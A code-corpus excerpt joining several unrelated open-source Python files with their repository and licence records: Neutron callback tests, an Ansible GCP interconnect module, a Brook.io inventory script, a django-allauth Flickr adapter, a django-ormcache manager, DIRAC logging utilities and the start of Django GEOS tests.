callback_1, resources.PORT, events.BEFORE_CREATE)
self.assertEqual(
1,
len(self.manager._callbacks[resources.PORT][events.BEFORE_CREATE]))
callbacks = self.manager._index[callback_id_1][resources.PORT]
self.assertEqual(1, len(callbacks))
def test_subscribe_multiple_callbacks(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.subscribe(
callback_2, resources.PORT, events.BEFORE_CREATE)
self.assertEqual(2, len(self.manager._index))
self.assertEqual(
2,
len(self.manager._callbacks[resources.PORT][events.BEFORE_CREATE]))
def test_unsubscribe(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.unsubscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.assertNotIn(
callback_id_1,
self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
self.assertNotIn(callback_id_1, self.manager._index)
def test_unsubscribe_unknown_callback(self):
self.manager.subscribe(
callback_2, resources.PORT, events.BEFORE_CREATE)
self.manager.unsubscribe(callback_1, mock.ANY, mock.ANY)
self.assertEqual(1, len(self.manager._index))
def test_unsubscribe_is_idempotent(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.unsubscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.unsubscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.assertNotIn(callback_id_1, self.manager._index)
self.assertNotIn(callback_id_1,
self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
def test_unsubscribe_by_resource(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_DELETE)
self.manager.subscribe(
callback_2, resources.PORT, events.BEFORE_DELETE)
self.manager.unsubscribe_by_resource(callback_1, resources.PORT)
self.assertNotIn(
callback_id_1,
self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
self.assertIn(
callback_id_2,
self.manager._callbacks[resources.PORT][events.BEFORE_DELETE])
self.assertNotIn(callback_id_1, self.manager._index)
def test_unsubscribe_all(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_DELETE)
self.manager.subscribe(
callback_1, resources.ROUTER, events.BEFORE_CREATE)
self.manager.unsubscribe_all(callback_1)
self.assertNotIn(
callback_id_1,
self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
self.assertNotIn(callback_id_1, self.manager._index)
def test_notify_none(self):
self.manager.notify(resources.PORT, events.BEFORE_CREATE, mock.ANY)
self.assertEqual(0, callback_1.counter)
self.assertEqual(0, callback_2.counter)
def test_feebly_referenced_callback(self):
self.manager.subscribe(lambda *x, **y: None, resources.PORT,
events.BEFORE_CREATE)
self.manager.notify(resources.PORT, events.BEFORE_CREATE, mock.ANY)
def test_notify_with_exception(self):
with mock.patch.object(self.manager, '_notify_loop') as n:
n.return_value = ['error']
self.assertRaises(exceptions.CallbackFailure,
self.manager.notify,
mock.ANY, events.BEFORE_CREATE,
'trigger', params={'a': 1})
expected_calls = [
mock.call(mock.ANY, 'before_create',
'trigger', params={'a': 1}),
mock.call(mock.ANY, 'abort_create',
'trigger', params={'a': 1})
]
n.assert_has_calls(expected_calls)
def test_notify_handle_exception(self):
self.manager.subscribe(
callback_raise, resources.PORT, events.BEFORE_CREATE)
e = self.assertRaises(exceptions.CallbackFailure, self.manager.notify,
resources.PORT, events.BEFORE_CREATE, self)
self.assertIsInstance(e.errors[0], exceptions.NotificationError)
def test_notify_called_once_with_no_failures(self):
with mock.patch.object(self.manager, '_notify_loop') as n:
n.return_value = False
self.manager.notify(resources.PORT, events.BEFORE_CREATE, mock.ANY)
n.assert_called_once_with(
resources.PORT, events.BEFORE_CREATE, mock.ANY)
def test__notify_loop_single_event(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.subscribe(
callback_2, resources.PORT, events.BEFORE_CREATE)
self.manager._notify_loop(
resources.PORT, events.BEFORE_CREATE, mock.ANY)
self.assertEqual(1, callback_1.counter)
self.assertEqual(1, callback_2.counter)
def test__notify_loop_multiple_events(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.subscribe(
callback_1, resources.ROUTER, events.BEFORE_DELETE)
self.manager.subscribe(
callback_2, resources.PORT, events.BEFORE_CREATE)
self.manager._notify_loop(
resources.PORT, events.BEFORE_CREATE, mock.ANY)
self.manager._notify_loop(
resources.ROUTER, events.BEFORE_DELETE, mock.ANY)
self.assertEqual(2, callback_1.counter)
self.assertEqual(1, callback_2.counter)
|
apache-2.0
|
valentin-krasontovitsch/ansible
|
lib/ansible/modules/cloud/google/gcp_compute_interconnect_attachment.py
|
1
|
15372
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_interconnect_attachment
description:
- Represents an InterconnectAttachment (VLAN attachment) resource. For more information,
see Creating VLAN Attachments.
short_description: Creates a GCP InterconnectAttachment
version_added: 2.8
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
interconnect:
description:
- URL of the underlying Interconnect object that this attachment's traffic will
traverse through.
required: true
description:
description:
- An optional description of this resource.
required: false
router:
description:
- URL of the cloud router to be used for dynamic routing. This router must be
in the same region as this InterconnectAttachment. The InterconnectAttachment
will automatically connect the Interconnect to the network & region within which
the Cloud Router is configured.
- 'This field represents a link to a Router resource in GCP. It can be specified
in two ways. First, you can place in the selfLink of the resource here as a
string Alternatively, you can add `register: name-of-resource` to a gcp_compute_router
task and then set this router field to "{{ name-of-resource }}"'
required: true
name:
description:
- Name of the resource. Provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
required: true
candidate_subnets:
description:
- Up to 16 candidate prefixes that can be used to restrict the allocation of cloudRouterIpAddress
and customerRouterIpAddress for this attachment.
- All prefixes must be within link-local address space (169.254.0.0/16) and must
be /29 or shorter (/28, /27, etc). Google will attempt to select an unused /29
from the supplied candidate prefix(es). The request will fail if all possible
/29s are in use on Google's edge. If not supplied, Google will randomly select
an unused /29 from all of link-local space.
required: false
vlan_tag8021q:
description:
- The IEEE 802.1Q VLAN tag for this attachment, in the range 2-4094.
required: false
region:
description:
- Region where the regional interconnect attachment resides.
required: true
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: create a interconnect attachment
gcp_compute_interconnect_attachment:
name: "test_object"
region: us-central1
project: "test_project"
auth_kind: "serviceaccount"
interconnect: https://googleapis.com/compute/v1/projects/test_project/global/interconnects/...
router: https://googleapis.com/compute/v1/projects/test_project/regions/us-central1/routers/...
service_account_file: "/tmp/auth.pem"
state: present
register: disk
'''
RETURN = '''
cloudRouterIpAddress:
description:
- IPv4 address + prefix length to be configured on Cloud Router Interface for this
interconnect attachment.
returned: success
type: str
customerRouterIpAddress:
description:
- IPv4 address + prefix length to be configured on the customer router subinterface
for this interconnect attachment.
returned: success
type: str
interconnect:
description:
- URL of the underlying Interconnect object that this attachment's traffic will
traverse through.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
privateInterconnectInfo:
description:
- Information specific to an InterconnectAttachment. This property is populated
if the interconnect that this is attached to is of type DEDICATED.
returned: success
type: complex
contains:
tag8021q:
description:
- 802.1q encapsulation tag to be used for traffic between Google and the customer,
going to and from this network and region.
returned: success
type: int
googleReferenceId:
description:
- Google reference ID, to be used when raising support tickets with Google or otherwise
to debug backend connectivity issues.
returned: success
type: str
router:
description:
- URL of the cloud router to be used for dynamic routing. This router must be in
the same region as this InterconnectAttachment. The InterconnectAttachment will
automatically connect the Interconnect to the network & region within which the
Cloud Router is configured.
returned: success
type: str
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
id:
description:
- The unique identifier for the resource. This identifier is defined by the server.
returned: success
type: str
name:
description:
- Name of the resource. Provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
candidateSubnets:
description:
- Up to 16 candidate prefixes that can be used to restrict the allocation of cloudRouterIpAddress
and customerRouterIpAddress for this attachment.
- All prefixes must be within link-local address space (169.254.0.0/16) and must
be /29 or shorter (/28, /27, etc). Google will attempt to select an unused /29
from the supplied candidate prefix(es). The request will fail if all possible
/29s are in use on Google's edge. If not supplied, Google will randomly select
an unused /29 from all of link-local space.
returned: success
type: list
vlanTag8021q:
description:
- The IEEE 802.1Q VLAN tag for this attachment, in the range 2-4094.
returned: success
type: int
region:
description:
- Region where the regional interconnect attachment resides.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
import re
import time
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
interconnect=dict(required=True, type='str'),
description=dict(type='str'),
router=dict(required=True),
name=dict(required=True, type='str'),
candidate_subnets=dict(type='list', elements='str'),
vlan_tag8021q=dict(type='int'),
region=dict(required=True, type='str'),
)
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
state = module.params['state']
kind = 'compute#interconnectAttachment'
fetch = fetch_resource(module, self_link(module), kind)
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module), kind)
fetch = fetch_resource(module, self_link(module), kind)
changed = True
else:
delete(module, self_link(module), kind)
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module), kind)
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.post(link, resource_to_request(module)))
def update(module, link, kind):
module.fail_json(msg="InterconnectAttachment cannot be edited")
def delete(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.delete(link))
def resource_to_request(module):
request = {
u'kind': 'compute#interconnectAttachment',
u'interconnect': module.params.get('interconnect'),
u'description': module.params.get('description'),
u'router': replace_resource_dict(module.params.get(u'router', {}), 'selfLink'),
u'name': module.params.get('name'),
u'candidateSubnets': module.params.get('candidate_subnets'),
u'vlanTag8021q': module.params.get('vlan_tag8021q'),
}
return_vals = {}
for k, v in request.items():
if v or v is False:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, kind, allow_not_found=True):
auth = GcpSession(module, 'compute')
return return_if_object(module, auth.get(link), kind, allow_not_found)
def self_link(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/interconnectAttachments/{name}".format(**module.params)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/interconnectAttachments".format(**module.params)
def return_if_object(module, response, kind, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError):
module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'cloudRouterIpAddress': response.get(u'cloudRouterIpAddress'),
u'customerRouterIpAddress': response.get(u'customerRouterIpAddress'),
u'interconnect': response.get(u'interconnect'),
u'description': response.get(u'description'),
u'privateInterconnectInfo': InterconnectAttachmentPrivateinterconnectinfo(response.get(u'privateInterconnectInfo', {}), module).from_response(),
u'googleReferenceId': response.get(u'googleReferenceId'),
u'router': response.get(u'router'),
u'creationTimestamp': response.get(u'creationTimestamp'),
u'id': response.get(u'id'),
u'name': response.get(u'name'),
u'candidateSubnets': response.get(u'candidateSubnets'),
u'vlanTag8021q': response.get(u'vlanTag8021q'),
}
def region_selflink(name, params):
if name is None:
return
url = r"https://www.googleapis.com/compute/v1/projects/.*/regions/[a-z1-9\-]*"
if not re.match(url, name):
name = "https://www.googleapis.com/compute/v1/projects/{project}/regions/%s".format(**params) % name
return name
def async_op_url(module, extra_data=None):
if extra_data is None:
extra_data = {}
url = "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/operations/{op_id}"
combined = extra_data.copy()
combined.update(module.params)
return url.format(**combined)
def wait_for_operation(module, response):
op_result = return_if_object(module, response, 'compute#operation')
if op_result is None:
return {}
status = navigate_hash(op_result, ['status'])
wait_done = wait_for_completion(status, op_result, module)
return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#interconnectAttachment')
def wait_for_completion(status, op_result, module):
op_id = navigate_hash(op_result, ['name'])
op_uri = async_op_url(module, {'op_id': op_id})
while status != 'DONE':
raise_if_errors(op_result, ['error', 'errors'], module)
time.sleep(1.0)
op_result = fetch_resource(module, op_uri, 'compute#operation')
status = navigate_hash(op_result, ['status'])
return op_result
def raise_if_errors(response, err_path, module):
errors = navigate_hash(response, err_path)
if errors is not None:
module.fail_json(msg=errors)
class InterconnectAttachmentPrivateinterconnectinfo(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'tag8021q': self.request.get('tag8021q')})
def from_response(self):
return remove_nones_from_dict({u'tag8021q': self.request.get(u'tag8021q')})
if __name__ == '__main__':
main()
|
gpl-3.0
|
alexlo03/ansible
|
contrib/inventory/brook.py
|
27
|
9611
|
#!/usr/bin/env python
# Copyright 2016 Doalitic.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Brook.io external inventory script
==================================
Generates inventory that Ansible can understand by making API requests to Brook.io via the libbrook
library. Hence, such dependency must be installed in the system to run this script.
The default configuration file is named 'brook.ini' and is located alongside this script. You can
choose any other file by setting the BROOK_INI_PATH environment variable.
If param 'project_id' is left blank in 'brook.ini', the inventory includes all the instances in
projects where the requesting user belongs. Otherwise, only instances from the given project are
included, provided the requesting user belongs to it.
The following variables are established for every host. They can be retrieved from the hostvars
dictionary.
- brook_pid: str
- brook_name: str
- brook_description: str
- brook_project: str
- brook_template: str
- brook_region: str
- brook_zone: str
- brook_status: str
- brook_tags: list(str)
- brook_internal_ips: list(str)
- brook_external_ips: list(str)
- brook_created_at
- brook_updated_at
- ansible_ssh_host
Instances are grouped by the following categories:
- tag:
A group is created for each tag. E.g. groups 'tag_foo' and 'tag_bar' are created if there exist
instances with tags 'foo' and/or 'bar'.
- project:
A group is created for each project. E.g. group 'project_test' is created if a project named
'test' exist.
- status:
A group is created for each instance state. E.g. groups 'status_RUNNING' and 'status_PENDING'
are created if there are instances in running and pending state.
Examples:
Execute uname on all instances in project 'test'
$ ansible -i brook.py project_test -m shell -a "/bin/uname -a"
Install nginx on all debian web servers tagged with 'www'
$ ansible -i brook.py tag_www -m apt -a "name=nginx state=present"
Run site.yml playbook on web servers
$ ansible-playbook -i brook.py site.yml -l tag_www
Support:
This script is tested on Python 2.7 and 3.4. It may work on other versions though.
Author: Francisco Ros <[email protected]>
Version: 0.2
"""
import sys
import os
try:
from ConfigParser import SafeConfigParser as ConfigParser
except ImportError:
from configparser import ConfigParser
import json
try:
import libbrook
except:
sys.exit('Brook.io inventory script requires libbrook. See https://github.com/doalitic/libbrook')
class BrookInventory:
_API_ENDPOINT = 'https://api.brook.io'
def __init__(self):
self._configure_from_file()
self.client = self.get_api_client()
self.inventory = self.get_inventory()
def _configure_from_file(self):
"""Initialize from .ini file.
Configuration file is assumed to be named 'brook.ini' and to be located on the same
directory than this file, unless the environment variable BROOK_INI_PATH says otherwise.
"""
brook_ini_default_path = \
os.path.join(os.path.dirname(os.path.realpath(__file__)), 'brook.ini')
brook_ini_path = os.environ.get('BROOK_INI_PATH', brook_ini_default_path)
config = ConfigParser(defaults={
'api_token': '',
'project_id': ''
})
config.read(brook_ini_path)
self.api_token = config.get('brook', 'api_token')
self.project_id = config.get('brook', 'project_id')
if not self.api_token:
sys.exit('You must provide (at least) your Brook.io API token to generate the dynamic '
'inventory.')
def get_api_client(self):
"""Authenticate user via the provided credentials and return the corresponding API client.
"""
# Get JWT token from API token
#
unauthenticated_client = libbrook.ApiClient(host=self._API_ENDPOINT)
auth_api = libbrook.AuthApi(unauthenticated_client)
api_token = libbrook.AuthTokenRequest()
api_token.token = self.api_token
jwt = auth_api.auth_token(token=api_token)
# Create authenticated API client
#
return libbrook.ApiClient(host=self._API_ENDPOINT,
header_name='Authorization',
header_value='Bearer %s' % jwt.token)
def get_inventory(self):
"""Generate Ansible inventory.
"""
groups = dict()
meta = dict()
meta['hostvars'] = dict()
instances_api = libbrook.InstancesApi(self.client)
projects_api = libbrook.ProjectsApi(self.client)
templates_api = libbrook.TemplatesApi(self.client)
# If no project is given, get all projects the requesting user has access to
#
if not self.project_id:
projects = [project.id for project in projects_api.index_projects()]
else:
projects = [self.project_id]
# Build inventory from instances in all projects
#
for project_id in projects:
project = projects_api.show_project(project_id=project_id)
for instance in instances_api.index_instances(project_id=project_id):
# Get template used for this instance if known
template = templates_api.show_template(template_id=instance.template) if instance.template else None
# Update hostvars
try:
meta['hostvars'][instance.name] = \
self.hostvars(project, instance, template, instances_api)
except libbrook.rest.ApiException:
continue
# Group by project
project_group = 'project_%s' % project.name
if project_group in groups:
groups[project_group].append(instance.name)
else:
groups[project_group] = [instance.name]
# Group by status
status_group = 'status_%s' % meta['hostvars'][instance.name]['brook_status']
if status_group in groups:
groups[status_group].append(instance.name)
else:
groups[status_group] = [instance.name]
# Group by tags
tags = meta['hostvars'][instance.name]['brook_tags']
for tag in tags:
tag_group = 'tag_%s' % tag
if tag_group in groups:
groups[tag_group].append(instance.name)
else:
groups[tag_group] = [instance.name]
groups['_meta'] = meta
return groups
def hostvars(self, project, instance, template, api):
"""Return the hostvars dictionary for the given instance.
Raise libbrook.rest.ApiException if it cannot retrieve all required information from the
Brook.io API.
"""
hostvars = instance.to_dict()
hostvars['brook_pid'] = hostvars.pop('pid')
hostvars['brook_name'] = hostvars.pop('name')
hostvars['brook_description'] = hostvars.pop('description')
hostvars['brook_project'] = hostvars.pop('project')
hostvars['brook_template'] = hostvars.pop('template')
hostvars['brook_region'] = hostvars.pop('region')
hostvars['brook_zone'] = hostvars.pop('zone')
hostvars['brook_created_at'] = hostvars.pop('created_at')
hostvars['brook_updated_at'] = hostvars.pop('updated_at')
del hostvars['id']
del hostvars['key']
del hostvars['provider']
del hostvars['image']
# Substitute identifiers for names
#
hostvars['brook_project'] = project.name
hostvars['brook_template'] = template.name if template else None
# Retrieve instance state
#
status = api.status_instance(project_id=project.id, instance_id=instance.id)
hostvars.update({'brook_status': status.state})
# Retrieve instance tags
#
tags = api.instance_tags(project_id=project.id, instance_id=instance.id)
hostvars.update({'brook_tags': tags})
# Retrieve instance addresses
#
addresses = api.instance_addresses(project_id=project.id, instance_id=instance.id)
internal_ips = [address.address for address in addresses if address.scope == 'internal']
external_ips = [address.address for address in addresses
if address.address and address.scope == 'external']
hostvars.update({'brook_internal_ips': internal_ips})
hostvars.update({'brook_external_ips': external_ips})
try:
hostvars.update({'ansible_ssh_host': external_ips[0]})
except IndexError:
raise libbrook.rest.ApiException(status='502', reason='Instance without public IP')
return hostvars
# Run the script
#
brook = BrookInventory()
print(json.dumps(brook.inventory))
|
gpl-3.0
|
kingofsystem/django-allauth
|
allauth/socialaccount/providers/flickr/views.py
|
65
|
1666
|
import json
from django.utils.http import urlencode
from allauth.socialaccount.providers.oauth.client import OAuth
from allauth.socialaccount.providers.oauth.views import (
OAuthAdapter,
OAuthLoginView,
OAuthCallbackView)
from .provider import FlickrProvider
class FlickrAPI(OAuth):
api_url = 'https://api.flickr.com/services/rest'
def get_user_info(self):
default_params = {'nojsoncallback': '1',
'format': 'json'}
p = dict({'method': 'flickr.test.login'},
**default_params)
u = json.loads(self.query(self.api_url + '?' + urlencode(p)))
p = dict({'method': 'flickr.people.getInfo',
'user_id': u['user']['id']},
**default_params)
user = json.loads(
self.query(self.api_url + '?' + urlencode(p)))
return user
class FlickrOAuthAdapter(OAuthAdapter):
provider_id = FlickrProvider.id
request_token_url = 'http://www.flickr.com/services/oauth/request_token'
access_token_url = 'http://www.flickr.com/services/oauth/access_token'
authorize_url = 'http://www.flickr.com/services/oauth/authorize'
def complete_login(self, request, app, token, response):
client = FlickrAPI(request, app.client_id, app.secret,
self.request_token_url)
extra_data = client.get_user_info()
return self.get_provider().sociallogin_from_response(request,
extra_data)
oauth_login = OAuthLoginView.adapter_view(FlickrOAuthAdapter)
oauth_callback = OAuthCallbackView.adapter_view(FlickrOAuthAdapter)
|
mit
|
educreations/django-ormcache
|
ormcache/managers.py
|
1
|
2096
|
from django.db.models.signals import class_prepared, post_delete, post_save
from django.utils.functional import cached_property
from ormcache.queryset import CachedQuerySet
class CachedManagerMixin(object):
@cached_property
def __cache_enabled(self):
return getattr(self.model, "cache_enabled", False)
def __require_cache(func):
def wrapper(self, *args, **kwargs):
if not self.__cache_enabled:
error = "Caching is not enabled on {}".format(str(type(self)))
raise RuntimeError(error)
return func(self, *args, **kwargs)
return wrapper
@__require_cache
def from_ids(self, ids, lookup='pk__in', **kwargs):
queryset = self.get_queryset()
return queryset.from_ids(ids, lookup=lookup, **kwargs)
@__require_cache
def invalidate(self, *args, **kwargs):
return self.get_queryset().invalidate(*args, **kwargs)
@__require_cache
def cache_key(self, *args, **kwargs):
return self.get_queryset().cache_key(*args, **kwargs)
# Django overrides
def contribute_to_class(self, model, name):
"""Override Django builtin"""
super(CachedManagerMixin, self).contribute_to_class(model, name)
class_prepared.connect(self.__class_prepared_cache, sender=model)
def get_queryset(self):
"""Override Django builtin"""
if self.__cache_enabled:
return CachedQuerySet(self.model)
else:
return super(CachedManagerMixin, self).get_queryset()
# Signals
def __class_prepared_cache(self, sender, **kwargs):
if self.__cache_enabled:
post_save.connect(self.__post_save_cache,
sender=self.model, weak=False)
post_delete.connect(self.__post_delete_cache,
sender=self.model, weak=False)
def __post_save_cache(self, instance, created, **kwargs):
self.invalidate(instance.pk, recache=True)
def __post_delete_cache(self, instance, **kwargs):
self.invalidate(instance.pk)
|
mit
|
wkrzemien/DIRAC
|
TransformationSystem/Agent/TransformationAgentsUtilities.py
|
7
|
3139
|
""" Utility Class for threaded agents (e.g. TransformationAgent)
Mostly for logging
"""
import time
from DIRAC import gLogger
__RCSID__ = "$Id$"
AGENT_NAME = ''
class TransformationAgentsUtilities(object):
""" logging utilities for threaded TS agents
"""
def __init__(self):
""" c'tor
"""
self.transInThread = {}
self.debug = False
def __threadForTrans(self, transID):
""" get the thread number """
try:
return self.transInThread.get(transID, ' [None] [%s] ' % transID) + AGENT_NAME + '.'
except NameError:
return ''
def _logVerbose(self, message, param='', method="execute", transID='None', reftime=None):
""" verbose """
if reftime is not None:
method += " (%.1f seconds)" % (time.time() - reftime)
if self.debug:
gLogger.info('(V) ' + self.__threadForTrans(transID) + method + ' ' + message, param)
else:
gLogger.verbose(self.__threadForTrans(transID) + method + ' ' + message, param)
def _logDebug(self, message, param='', method="execute", transID='None', reftime=None):
""" debug """
if reftime is not None:
method += " (%.1f seconds)" % (time.time() - reftime)
gLogger.debug(self.__threadForTrans(transID) + method + ' ' + message, param)
def _logInfo(self, message, param='', method="execute", transID='None', reftime=None):
""" info """
if reftime is not None:
method += " (%.1f seconds)" % (time.time() - reftime)
gLogger.info(self.__threadForTrans(transID) + method + ' ' + message, param)
def _logWarn(self, message, param='', method="execute", transID='None', reftime=None):
""" warn """
if reftime is not None:
method += " (%.1f seconds)" % (time.time() - reftime)
gLogger.warn(self.__threadForTrans(transID) + method + ' ' + message, param)
def _logError(self, message, param='', method="execute", transID='None', reftime=None):
""" error """
if reftime is not None:
method += " (%.1f seconds)" % (time.time() - reftime)
gLogger.error(self.__threadForTrans(transID) + method + ' ' + message, param)
def _logException(self, message, param='', lException=False, method="execute", transID='None', reftime=None):
""" exception """
if reftime is not None:
method += " (%.1f seconds)" % (time.time() - reftime)
gLogger.exception(self.__threadForTrans(transID) + method + ' ' + message, param, lException)
def _logFatal(self, message, param='', method="execute", transID='None', reftime=None):
""" error """
if reftime is not None:
method += " (%.1f seconds)" % (time.time() - reftime)
gLogger.fatal(self.__threadForTrans(transID) + method + ' ' + message, param)
def _transTaskName(self, transID, taskID): # pylint: disable=no-self-use
""" Construct the task name from the transformation and task ID """
return str(transID).zfill(8) + '_' + str(taskID).zfill(8)
def _parseTaskName(self, taskName): # pylint: disable=no-self-use
""" Split a task name into transformation and taskID """
try:
return (int(x) for x in taskName.split('_'))
except ValueError:
return (0, 0)
|
gpl-3.0
|
MounirMesselmeni/django
|
tests/gis_tests/geos_tests/test_geos.py
|
5
|
46748
|
from __future__ import unicode_literals
import ctypes
import json
import random
import unittest
from binascii import a2b_hex, b2a_hex
from io import BytesIO
from unittest import skipUnless
from django.contrib.gis import gdal
from django.contrib.gis.gdal import HAS_GDAL
from django.contrib.gis.geos import (
HAS_GEOS, GeometryCollection, GEOSException, GEOSGeometry, LinearRing,
LineString, MultiLineString, MultiPoint, MultiPolygon, Point, Polygon,
fromfile, fromstr,
)
from django.contrib.gis.geos.base import GEOSBase
from django.contrib.gis.shortcuts import numpy
from django.template import Context
from django.template.engine import Engine
from django.test import mock
from django.utils import six
from django.utils.encoding import force_bytes
from django.utils.six.moves import range
from ..test_data import TestDataMixin
@skipUnless(HAS_GEOS, "Geos is required.")
class GEOSTest(unittest.TestCase, TestDataMixin):
def test_base(self):
"Tests out the GEOSBase class."
# Testing out GEOSBase class, which provides a `ptr` property
# that abstracts out access to underlying C pointers.
class FakeGeom1(GEOSBase):
pass
# This one only accepts pointers to floats
c_float_p = ctypes.POINTER(ctypes.c_float)
class FakeGeom2(GEOSBase):
ptr_type = c_float_p
# Default ptr_type is `c_void_p`.
fg1 = FakeGeom1()
# Default ptr_type is C float pointer
fg2 = FakeGeom2()
# These assignments are OK -- None is allowed because
# it's equivalent to the NULL pointer.
fg1.ptr = ctypes.c_void_p()
fg1.ptr = None
fg2.ptr = c_float_p(ctypes.c_float(5.23))
fg2.ptr = None
# Because pointers have been set to NULL, an exception should be
# raised when we try to access it. Raising an exception is
# preferable to a segmentation fault that commonly occurs when
# a C method is given a NULL memory reference.
for fg in (fg1, fg2):
# Equivalent to `fg.ptr`
self.assertRaises(GEOSException, fg._get_ptr)
# Anything that is either not None or the acceptable pointer type will
# result in a TypeError when trying to assign it to the `ptr` property.
# Thus, memory addresses (integers) and pointers of the incorrect type
# (in `bad_ptrs`) will not be allowed.
bad_ptrs = (5, ctypes.c_char_p(b'foobar'))
for bad_ptr in bad_ptrs:
# Equivalent to `fg.ptr = bad_ptr`
self.assertRaises(TypeError, fg1._set_ptr, bad_ptr)
self.assertRaises(TypeError, fg2._set_ptr, bad_ptr)
def test_wkt(self):
"Testing WKT output."
for g in self.geometries.wkt_out:
geom = fromstr(g.wkt)
if geom.hasz:
self.assertEqual(g.ewkt, geom.wkt)
def test_hex(self):
"Testing HEX output."
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex.decode())
def test_hexewkb(self):
"Testing (HEX)EWKB output."
# For testing HEX(EWKB).
ogc_hex = b'01010000000000000000000000000000000000F03F'
ogc_hex_3d = b'01010000800000000000000000000000000000F03F0000000000000040'
# `SELECT ST_AsHEXEWKB(ST_GeomFromText('POINT(0 1)', 4326));`
hexewkb_2d = b'0101000020E61000000000000000000000000000000000F03F'
# `SELECT ST_AsHEXEWKB(ST_GeomFromEWKT('SRID=4326;POINT(0 1 2)'));`
hexewkb_3d = b'01010000A0E61000000000000000000000000000000000F03F0000000000000040'
pnt_2d = Point(0, 1, srid=4326)
pnt_3d = Point(0, 1, 2, srid=4326)
# OGC-compliant HEX will not have SRID value.
self.assertEqual(ogc_hex, pnt_2d.hex)
